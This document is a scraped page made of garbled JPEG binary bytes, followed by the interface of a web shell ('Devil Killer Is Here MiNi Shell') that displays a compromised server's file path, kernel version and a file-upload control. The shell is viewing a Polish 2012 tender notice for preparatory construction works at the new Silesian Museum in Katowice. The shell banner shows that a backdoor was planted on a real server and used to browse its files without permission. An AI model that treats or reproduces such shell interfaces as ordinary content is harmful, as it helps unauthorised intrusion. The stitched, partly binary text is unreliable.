JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20121115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20121115/452846-N-2012.html

<p class="kh_header"><b>Katowice: Roboty przygotowawcze związane z budową nowej siedziby Muzeum Śląskiego ETAP 2</b><br>
<b>Numer ogłoszenia: 452846 - 2012; data zamieszczenia: 15.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Śląskie , Al. Korfantego 3, 40-005 Katowice, woj. śląskie, tel. 032 2585661-3; 3503672, faks 032 2599804.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.muzeumslaskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty przygotowawcze związane z budową nowej siedziby Muzeum Śląskiego ETAP 2.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Teren budowy zlokalizowany jest w obszarze byłej kopalni Katowice (rejon ulic Nadgórników, Kopalnianej), projektowanej ulicy Dudy Gracza i Parku Bogucickiego. Teren opracowania jak i tereny sąsiadujące przeznaczone są dla funkcji publicznej. Budowa obiektów Muzeum Śląskiego jest jednym z działań rewitalizacji tego terenu poprzemysłowego; ma również służyć aktywizacji działań zmierzających do zagospodarowania terenów oraz obiektów części północnej Kwartału Muzeów. Inwestycja znajduje się na terenie objętym ochroną konserwatorską ze względu na dziedzictwo kulturowe. Prowadzone prace będą robotami przygotowawczymi dla realizacji budowy Muzeum Śląskiego.
Przedsięwzięcie obejmuje w szczególności wykonanie:

1. adaptacji warsztatu elektrycznego na budynek techniczny (budynek MS46):
Roboty rozbiórkowe, budowlano-konstrukcyjne, instalacji sanitarnych w zakresie kanalizacji sanitarnej (z białym montażem), wody pitnej, wody ciepłej użytkowej, wentylacji mechanicznej wywiewnej, elektrycznych (kompletnej instalacji odgromowej, kompletnej instalacji oświetlenia wraz z lampami i gniazdek wraz z osprzętem i grzejnikami, kompletnej instalacji słaboprądowej wraz z osprzętem, kompletnej instalacji  uziemienia budynku), wykończeniowe wewnętrzne i zewnętrzne (elewacyjne), zagospodarowanie terenu wokół budynku (wycinka drzew, nasadzenia ), drogi i chodniki (rozbiórka i odtworzenie), ogrodzenie systemowe wraz z bramą i furtką, ukształtowanie terenu (rozbiórka muru, makroniwelacja mas ziemnych, humusowanie) instalacja iluminacji elewacji budynku, drenaż zewnętrzny budynku 

2. sieci kanalizacji deszczowej wraz z podejściami pod rury spustowe: 
Sieć kanalizacji wód opadowych obejmuje odprowadzenie wód deszczowych z powierzchni utwardzonych, terenów zielonych oraz z istniejących i projektowanych budynków położonych w północnej części obszaru muzeum. Na projektowaną sieć kanalizacji wód opadowych składa się kolektor wód deszczowych KD1, KD17, KD2, KD14 oraz odcinek KZd1-S20. W celu zredukowania maksymalnych przepływów w kolektorze projektuje się na sieci zbiorniki retencyjne (wyrównawcze).  Całkowita długość sieci kanalizacji wód opadowych na obszarze terenu Muzeum wynosi  około 660 mb. W ramach sieci kanalizacji deszczowej należy wykonać również odprowadzenie wód opadowych z nawierzchni drogowych poprzez wpusty drogowe oraz system odwodnienia liniowego. 

3. przepompowni wód drenażowych:
Dla odprowadzenia wód drenażowych zaprojektowano  kompletną prefabrykowaną pompownię ścieków ( z szafka zasilającą i sterującą) o średnicy 2500 mm i głębokości ok.14 m. Przepompownia będzie zlokalizowana w części południowej obszaru muzeum, poniżej budynku głównego. Do pompowni rurociągiem grawitacyjnym o średnicy 400mm doprowadzone są wody z drenażu górnego i drenażu dolnego budynku muzeum, skąd pompowane są do studni rozprężnej KZD1 i dalej rurociągiem grawitacyjnym wody drenażowe spływają do studni zbiorczej S20 na nowo wykonanym kolektorze miejskim . 

4. sieci wodociągowej w zakresie: 
Zaprojektowano rurociąg główny o średnicy Dn 160 mm z rur polietylenowych PE100. Całkowita długość sieci wodociągowej wraz z przyłączami do wykonania według niniejszego opracowania na obszarze terenu Muzeum wynosi około 800 m. 

5.sieć kanalizacji sanitarnej: 
Sieć kanalizacji sanitarnej obejmuje odprowadzenie ścieków sanitarnych z istniejących i projektowanych budynków położonych w północnej części obszaru muzeum.  Na projektowaną sieć składa się: kolektor KS wraz z trzema sięgaczami, sięgacze KS22, KS21, KS12, KS11 oraz odcinek KZ3-k356. Przyjęto rurociąg z PE o średnicy Dn = 200 o sztywności obwodowej klasy SN8. Zaprojektowano rury dostosowane do posadowienia na  terenach ewentualnych szkód górniczych (do IV kategorii włącznie) o średnicy Dn 200 mm a dla przyłączy o średnicy Dn 160 mm.W skład sieci kanalizacji sanitarnej wchodzą studzienki kanalizacyjne o średnicy 1.2, 0,8 m, 0,6 m, 0,4 m. Całkowita długość sieci kanalizacyjnej na obszarze terenu Muzeum wynosi około 312 mb.

6. sieć elektryczna i niskoprądowa: 
linie kablowe oraz wyposażenie i uruchomienie komór wewnętrznej trafostacji w budynku MS 46  (m.in. dostawa transformatora, dostawa i montaż rozdzielnicy średniego napięcia  i  rozdzielnicy niskiego napięcia, dostawa i uruchomienie układu pomiarowego ) wraz z liniami zasilającymi, linia kablowa nasłupowa z rozdzielnicy RG3 w budynku MS46 do zasilania istniejących budynków zlokalizowanych w północnej części kwartału Muzeów z  pomiarami i uruchomieniem zasilania, sieć niskoprądowa ułożona w kanalizacji z rur ochronnych  od budynku MS 46 do budynku głównego wraz z podłączeniem do BMS-u, oświetlenie drogi pożarowej z kostki (lampy i okablowanie ze studniami i linią zasilająca z budynku stolarni), słupki automatyczne ze sterowaniem (w tym wideodomofonowy), zasilanie elektryczne stolarni - budynek M18 z rozdzielnicy 2RG2 w budynku głównym  . 

7. wykonanie nawierzchni docelowej drogi wewnętrznej pomiędzy murami oporowymi MŻ 1, 2, 3 (drogi pożarowej) :  
nawierzchnia drogi i chodników z kostki granitowej  wraz z elementami robót wykończeniowych murów oporowych (konstrukcje stalowe, balustrady, okładziny ścian z blachy kortenowej, kasetony i maszty reklamowe) 

8. wykonanie drogi z płyt betonowych wraz z wyłożeniem skarp płytami ażurowymi - dojazd do budynku CZOK-u : 
ułożenie nawierzchni z płyt betonowych wraz z korytkami odwodniającymi, regulacja studni, wyłożenie skarp płytami ażurowymi, rozbiórka starych fundamentów łaźni w strefie robót drogowych, brama wjazdowa przy wyjeździe na teren północny Muzeum, ogrodzenie systemowe wraz z bramą około 30 mb 

Roboty będące przedmiotem niniejszego Kontraktu będą wykonane zgodnie z warunkami kontraktowymi dla budowy dla robót inżynieryjno-budowlanych projektowanych przez Zamawiającego, pierwsze wydanie w języku angielskim 1999, przygotowane i opublikowane przez Międzynarodową Federację Inżynierów Konsultantów (Fédération Internationale des Ingénieurs-Conseils - FIDIC), P.O. Box 86, CH-1000 Lausanne 12, Szwajcaria, oraz drugie wydanie angielsko - polskie 2000 (tłumaczenie pierwszego wydania z 1999 r.) - nazywane dalej FIDIC- czerwona książka, zwane dalej Warunkami Kontraktowymi).

UWAGA:
Termin realizacji zamówienia wynosi do 21 miesięcy od daty podpisania Umowy na Roboty, w tym:
- do 14 dni od podpisania umowy do Daty Rozpoczęcia,
- 8 miesięcy realizacji licząc od Daty Rozpoczęcia wyznaczonej zgodnie z kl. 8.1. warunków Kontraktowych FIDIC, w tym ETAP I oraz ETAP II:
ETAP I - 2 miesiące licząc od Daty Rozpoczęcia wyznaczonej zgodnie z kl.8.1 warunków Kontraktowych FIDIC na:
a) wykonanie, uruchomienie i przekazanie do eksploatacji Zamawiającemu trafostacji w budynku MS46 (warsztat elektryczny) wyposażonej w urządzenia wraz z liniami kablowymi SN. Powyższe powinno umożliwić zasilenie i opomiarowanie budynku głównego Muzeum Śląskiego pozwalające na jego eksploatację i uzyskanie pozwolenia na użytkowanie,
b) wykonanie kompletnego zakresu robót sieciowych w zakresie odprowadzenia wód drenażowych i deszczowych z terenu Nowego Muzeum wraz z montażem i uruchomieniem przepompowni wód drenażowych łącznie z wykonaniem odprowadzeń do kolektora odbiorczego, 
c) wykonanie odprowadzenia sieci sanitarnej w rejonie ul. Roździeńskiego z terenu Nowego Muzeum do istniejącej sieci, 
d) światłowód od MS46 do MS-GG (budynek główny) zapewniający sterowanie obiektami poprzez BMS. 
ETAP II - do 31.05.2013r. na wykonanie robót wg punktu 4.7 IDW - droga wewnętrzna w zakresie niezbędnych robót oraz uzgodnień umożliwiających dokonanie zgłoszenia zakończenia robót w Powiatowym Inspektoracie Nadzoru Budowlanego.
Powyższe roboty w zakresie ETAPU I i ETAPU II mają umożliwić Zamawiającemu uzyskanie pozwolenia na użytkowanie Nowego Muzeum Śląskiego. 
- 12 miesięcy - Okres Zgłaszania Wad, tj. od daty ukończenia robót określonej w wydanym Świadectwie Przejęcia.
Okres rękojmi - 36 miesięcy od daty wydania Świadectwa Przejęcia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 upzp w wysokości do 50 % zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.10.00.00-8, 45.30.00.00-0, 45.40.00.00-1, 77.00.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy Wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości 100 000,00 PLN (słownie: sto tysięcy 00/100 PLN)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia warunku będzie dokonywana metodą 0 - 1, tj. spełnia/nie spełnia, w oparciu o Oświadczenie dołączone do oferty</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że w ostatnich pięciu latach przed dniem składania ofert w niniejszym postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył: 

- co najmniej 1 robotę budowlaną dotyczącą budowy lub przebudowy obiektów kubaturowych o wartości  min 2 000 000 PLN (bez  podatku VAT)   

oraz 
- co najmniej 1 robotę budowlaną dotyczącą budowy sieci wodno-kanalizacyjnej o wartości min 500 000 PLN  (bez  podatku VAT) 
 
oraz 
- co najmniej 1 robotę budowlaną dotyczącą  budowy linii kablowych średniego napięcia  wraz z budową i wyposażeniem w urządzenia trafostacji o wartości min 500 000 PLN  (bez  podatku VAT) 

Za roboty ukończone Zamawiający uważa roboty, dla których wydano Świadectwo Przejęcia lub inny równoważny dokument np. Protokół odbioru końcowego robót.  Zamawiający uzna za spełnienie wymagań wykonanie wykazanych robót w kilku lub jednej inwestycji łącznie, z zastrzeżeniem wydzielenia wartości wymaganych robót.

Zamawiający dokona oceny spełnienia przez Wykonawcę powyższego warunku udziału w postępowaniu na podstawie oświadczenia oraz dokumentów złożonych przez Wykonawcę.
Ocena spełniania przedstawionych powyżej warunków zostanie dokonana metodą 0 - 1, tj. spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować odpowiednim potencjałem technicznym. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia warunku będzie dokonywana metodą 0 - 1, tj. spełnia/nie spełnia, w oparciu o Oświadczenie dołączone do oferty</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że dysponuje następującymi osobami zdolnymi do wykonania zamówienia:
1)	Ekspert 1 (1 osoba) - Kierownik Budowy - posiadający:
- uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej bez ograniczeń;
- doświadczenie zawodowe na stanowisku kierownika budowy  lub kierownika robót konstrukcyjno budowlanych przy realizacji co najmniej  2  zakończonych kontraktów w zakresie budowy lub przebudowy obiektów kubaturowych o wartości każdej z wskazanych robót budowlanych min 1 000 000 PLN każda (bez  podatku VAT) . 
- co najmniej 2-letnią praktykę na budowie przy zabytkach nieruchomych, lub posiada uprawnienia do prowadzenia prac w obiektach zabytkowych, potwierdzone stosownym zaświadczeniem Wojewódzkiego Konserwatora Zabytków, zgodnie  z rozporządzeniem Ministra Kultury z dnia 9 czerwca 2004 roku w sprawie  prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz.U. 2004 nr 150, poz.1579),

2)	Ekspert 2  (1 osoba)-Kierownik robót sanitarnych - posiadający:
- uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych zgodnie z polskimi przepisami Prawa budowlanego; 
- doświadczenie zawodowe na stanowisku kierownika budowy/robót przy realizacji co najmniej 1 zakończonego kontraktu w zakresie  budowy  sieci wodno kanalizacyjnej  o wartości wskazanych robót budowlanych min 500 000  PLN ( bez  podatku VAT)  . 

3)	Ekspert 3 (1 osoba)-Kierownik robót elektrycznych - posiadający:
- uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej  w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych  zgodnie z polskimi przepisami Prawa budowlanego;
- doświadczenie zawodowe na stanowisku kierownika robót elektrycznych   przy realizacji co najmniej 1 zakończonego kontraktu w zakresie  budowy  linii kablowych średniego napięcia wraz z budową i wyposażeniem w urządzenia trafostacji o wartości wskazanych robót budowlanych min 500 000 PLN ( bez  podatku VAT) .

Za roboty ukończone Zamawiający uważa roboty, dla których wydano Świadectwo Przejęcia lub inny równoważny dokument np. Protokół odbioru końcowego robót .  

Posiadane przez w/w Ekspertów uprawnienia w wymaganym zakresie, stosownie do wymagań określonych w ogłoszeniu i SIWZ powinny być zgodne z ustawą z dnia 7 lipca 1994r, Prawo budowlane (Dz. U. z 2006 r. Nr 156, poz. 1118 z późn. zm.) oraz aktualnym obowiązującym rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia.2006r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz.U. nr 83 z 2006r., poz. 578;). 
Osoby, które posiadają uzyskane przed dniem wejścia w życie ustawy z dnia 7 lipca 1994r. Prawo budowlane, uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego odpowiednie do realizacji przedmiotu zamówienia, do pełnienia samodzielnych funkcji technicznych w budownictwie i zachowały uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie wykazują te dokumenty jako obowiązujące.

Zamawiający określając wymogi dla każdej osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza, odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane (tekst jedn. Dz. U. z 2006 r., Nr 156, poz. 1118 ze zm.) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U z 2008 r., Nr 63, poz. 394).

Zamawiający dokona oceny spełnienia przez Wykonawcę powyższego warunku udziału w postępowaniu na podstawie oświadczenia oraz dokumentów złożonych przez Wykonawcę.
Ocena spełniania przedstawionych powyżej warunków zostanie dokonana metodą 0 - 1, tj. spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	Wykonawca posiada środki finansowe w wysokości co najmniej 1 000 000 PLN lub zdolność kredytową w wysokości co najmniej 1 000 000 PLN.

2)	Wykonawca posiada opłacone ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości co najmniej 2 000 000 PLN

Zamawiający dokona oceny spełnienia przez Wykonawcę powyższego warunku udziału w postępowaniu na podstawie oświadczenia oraz dokumentów złożonych przez Wykonawcę.
Ocena spełniania przedstawionych powyżej warunków zostanie dokonana metodą 0 - 1, tj. spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 44 upzp

Zgodnie z art. 26 ust 2b upzp wykonawca może polegać na wiedzy i doświadczeniu potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolności finansowej  innych podmiotów, niezależnie od charakteru Prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
